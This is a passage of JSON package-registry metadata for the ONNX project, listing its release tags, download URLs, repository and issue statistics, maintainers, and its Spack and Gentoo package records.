nvidia, onnx, open-keychain, pytorch, sipb, skywork ai, sql-machine-learning, uc berkeley"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}}]},"last_synced_at":"2025-08-17T07:32:27.176Z","repository_id":24890799,"created_at":"2025-08-17T07:32:27.176Z","updated_at":"2025-08-17T07:32:27.176Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281322869,"owners_count":26481547,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-27T02:00:05.855Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"onnx","name":"Open Neural Network Exchange","uuid":"31675368","kind":"organization","description":"ONNX is an open ecosystem for interoperable AI models. It's a community project: we welcome your contributions!","email":null,"website":"https://onnx.ai","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/31675368?v=4","repositories_count":25,"last_synced_at":"2024-04-18T02:52:20.873Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/onnx","funding_links":[],"total_stars":37281,"followers":1377,"following":0,"created_at":"2022-11-02T16:24:54.756Z","updated_at":"2024-04-18T02:52:25.131Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx/repositories"},"tags":[{"name":"v1.19.1","sha":"b751946c3d59a3c8358abcc0569b59e6ddb08cdd","kind":"commit","published_at":"2025-10-08T03:53:00.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.19.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"57b9c6a4f6eebb09ae1b34cfb632078518f72832","kind":"commit","published_at":"2025-08-26T21:37:09.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.19.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.0/manifests"},{"name":"v1.18.0","sha":"e709452ef2bbc1d113faf678c24e6d3467696e83","kind":"commit","published_at":"2025-05-08T17:33:57.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.18.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.18.0/manifests"},{"name":"v1.17.0","sha":"b8baa8446686496da4cc8fda09f2b6fe65c2a02c","kind":"commit","published_at":"2024-09-30T22:42:05.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.17.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.17.0/manifests"},{"name":"v1.16.2","sha":"3bf92c03a9f27eba3bda1e5b9e63ea20ec213557","kind":"commit","published_at":"2024-07-31T13:15:06.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"595228d99e3977ac27cb79d5963adda262af99ad","kind":"commit","published_at":"2024-05-23T16:33:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"990217f043af7222348ca8f0301e17fa7b841781","kind":"commit","published_at":"2024-03-25T13:55:50.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0/manifests"},{"name":"v1.15.0","sha":"b86cc54efce19530fb953e4b21f57e6b3888534c","kind":"commit","published_at":"2023-10-25T22:10:41.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.15.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0/manifests"},{"name":"v1.14.1","sha":"1014f41f17ecc778d63e760a994579d96ba471ff","kind":"commit","published_at":"2023-08-24T22:20:34.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"a0d77f18516d2da7468a96b0de3b737266f23176","kind":"commit","published_at":"2023-05-04T00:14:24.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0/manifests"},{"name":"v1.13.1","sha":"ad834eb73ee0cd9b6fa9ea892caeed5fa17d7dc0","kind":"commit","published_at":"2023-02-21T22:21:30.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"1ba785612a79fe749aa1e478336e534743372639","kind":"commit","published_at":"2022-12-09T18:56:29.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0/manifests"},{"name":"v1.12.0","sha":"f7ee1ac60d06abe8e26c9b6bbe1e3db5286b614b","kind":"commit","published_at":"2022-06-17T23:32:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.12.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"96046b8ccfb8e6fa82f6b2b34b3d56add2e8849c","kind":"commit","published_at":"2022-02-16T23:56:21.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.11.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0/manifests"},{"name":"v1.10.2","sha":"da889e6b95750350726d149bf447bf0cd1245964","kind":"commit","published_at":"2021-10-25T15:52:09.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1f63dcb7fcc3a8bf5c3c8e326867ecd6f5c43f35","kind":"commit","published_at":"2021-08-02T16:53:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"7c1e0b0391d06002789e56f8fe0c7bb9f4d1159b","kind":"commit","published_at":"2021-07-30T20:26:55.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0/manifests"},{"name":"v1.9.0","sha":"1089b9e8045a3a2882d7bb6a1dbaeaf9cae131da","kind":"commit","published_at":"2021-04-19T09:51:42.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.9.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0/manifests"},{"name":"v1.8.1","sha":"685898bc6f3fd6eb16ba129ea990f96330537e38","kind":"commit","published_at":"2021-01-29T23:23:52.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"994c6181247d7b419b28889fc57d5817e2089419","kind":"commit","published_at":"2020-11-06T05:01:27.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0/manifests"},{"name":"v1.7.0","sha":"0c070abb0c40fec649f81a73a75b0098662ec486","kind":"commit","published_at":"2020-05-08T21:09:31.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.7.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"553df22c67bee5f0fe6599cff60f1afc6748c635","kind":"commit","published_at":"2019-09-25T20:35:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.6.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0/manifests"},{"name":"v1.5.0","sha":"94d238d96e3fb3a7ba34f03c284b9ad3516163be","kind":"commit","published_at":"2019-04-24T05:05:06.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.5.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0/manifests"},{"name":"v1.4.1","sha":"9e55ace55aad1ada27516038dfbdc66a8a0763db","kind":"commit","published_at":"2019-01-23T23:05:32.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"8a1319733a5518bd0001842db27e2df53a306eff","kind":"commit","published_at":"2019-01-23T01:49:13.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0/manifests"},{"name":"v1.2.3","sha":"5af210ca8a1c73aa6bae8754c9346ec54d0a756e","kind":"commit","published_at":"2018-09-07T22:57:18.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.3","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3/manifests"},{"name":"v1.3.0","sha":"bae6333e149a59a3faa9c4d9c44974373dcf5256","kind":"commit","published_at":"2018-08-30T17:33:20.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.3.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0/manifests"},{"name":"v1.2.2","sha":"3376d4438aaadfba483399fa249b841153152bc0","kind":"commit","published_at":"2018-06-18T18:43:47.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"c7b60050ad6ae963bf2cc1d0eb3c32b07eb7eeed","kind":"commit","published_at":"2018-05-25T02:03:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1/manifests"},{"name":"v1.1.2","sha":"2f85783fc43576b5e39b207f95d5f789641ae706","kind":"commit","published_at":"2018-04-25T23:02:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2/manifests"},{"name":"v1.1.0","sha":"79dc46fa4d484981f75695a73f3d38d5717fc435","kind":"commit","published_at":"2018-03-10T06:34:57.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0/manifests"},{"name":"v1.0.1","sha":"7633012b06b4caf0f829060668d06948c7f42e03","kind":"commit","published_at":"2018-01-26T02:25:37.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1/manifests"},{"name":"v1.0","sha":"5712a94fa8bd9cb4c99f2a5c05156576739f76f4","kind":"commit","published_at":"2017-12-04T21:39:16.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0/manifests"},{"name":"v0.2","sha":"63569b8a2e2ad4f56c5476954337a87cc4428862","kind":"commit","published_at":"2017-10-10T04:52:28.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.2","html_url":"https://github.com/onnx/onnx/releases/tag/v0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2/manifests"},{"name":"v0.1","sha":"bbe22f447a4f3c38642dc9ca7ba0e8dd1ebaef94","kind":"commit","published_at":"2017-09-07T07:56:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1/manifests"}]},"repo_metadata_updated_at":"2025-10-27T18:39:37.922Z","dependent_packages_count":7,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":8.447964429623454,"stargazers_count":0.5974711685424483,"forks_count":0.4446297068222871,"average":2.3725163262470472},"purl":"pkg:spack/py-onnx","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/spack/py-onnx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/spack/py-onnx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/spack/py-onnx/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-25T16:00:29.826Z","issues_count":1002,"pull_requests_count":2088,"avg_time_to_close_issue":24651025.396024466,"avg_time_to_close_pull_request":3750894.192264574,"issues_closed_count":653,"pull_requests_closed_count":1784,"pull_request_authors_count":174,"issue_authors_count":605,"avg_comments_per_issue":2.6766467065868262,"avg_comments_per_pull_request":1.985632183908046,"merged_pull_requests_count":1448,"bot_issues_count":5,"bot_pull_requests_count":386,"past_year_issues_count":201,"past_year_pull_requests_count":1024,"past_year_avg_time_to_close_issue":1563078.0,"past_year_avg_time_to_close_pull_request":426840.47297297296,"past_year_issues_closed_count":79,"past_year_pull_requests_closed_count":814,"past_year_pull_request_authors_count":69,"past_year_issue_authors_count":120,"past_year_avg_comments_per_issue":1.5621890547263682,"past_year_avg_comments_per_pull_request":1.6904296875,"past_year_bot_issues_count":5,"past_year_bot_pull_requests_count":186,"past_year_merged_pull_requests_count":706,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/issues","maintainers":[{"login":"andife","count":435,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"justinchuby","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinchuby"},{"login":"jcwchen","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jcwchen"},{"login":"liqunfu","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/liqunfu"},{"login":"daquexian","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/daquexian"},{"login":"take-cheeze","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"},{"login":"zhenhuaw-me","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhenhuaw-me"},{"login":"prasanthpul","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/prasanthpul"},{"login":"jbachurski","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbachurski"},{"login":"houseroad","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/houseroad"},{"login":"lutzroeder","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lutzroeder"},{"login":"linkerzhang","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/linkerzhang"},{"login":"xuzijian629","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xuzijian629"},{"login":"philass","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philass"}],"active_maintainers":[{"login":"andife","count":332,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"justinchuby","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinchuby"},{"login":"take-cheeze","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-onnx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-onnx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-onnx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-onnx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-onnx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-onnx/codemeta","maintainers":[{"uuid":"wdconinc","login":"wdconinc","name":null,"email":null,"url":"https://github.com/wdconinc","packages_count":165,"html_url":null,"role":null,"created_at":"2025-12-05T18:44:51.216Z","updated_at":"2025-12-05T18:44:51.216Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/maintainers/wdconinc/packages"}],"registry":{"name":"spack.io","url":"https://packages.spack.io","ecosystem":"spack","default":true,"packages_count":9208,"maintainers_count":989,"namespaces_count":0,"keywords_count":3801,"github":"spack","metadata":{"funded_packages_count":440},"icon_url":"https://github.com/spack.png","created_at":"2022-04-04T15:19:23.514Z","updated_at":"2026-06-10T05:19:56.194Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/namespaces"}},{"id":14520251,"name":"sci-ml/onnx","ecosystem":"gentoo","description":"Open Neural Network Exchange (ONNX)","homepage":"https://github.com/onnx/onnx","licenses":"Apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/onnx/onnx","keywords_array":["~amd64","~arm64","~riscv"],"namespace":"sci-ml","versions_count":2,"first_release_published_at":"2026-05-11T16:39:47.000Z","latest_release_published_at":"2026-05-11T16:39:47.000Z","latest_release_number":"1.20.1","last_synced_at":"2026-05-27T04:28:50.778Z","created_at":"2026-05-27T04:28:50.463Z","updated_at":"2026-05-27T04:32:16.032Z","registry_url":"https://packages.gentoo.org/packages/sci-ml/onnx","install_command":"emerge sci-ml/onnx","documentation_url":"https://packages.gentoo.org/packages/sci-ml/onnx","metadata":{"category":"sci-ml","slot":"0","eapi":"8","inherit":"distutils-r1 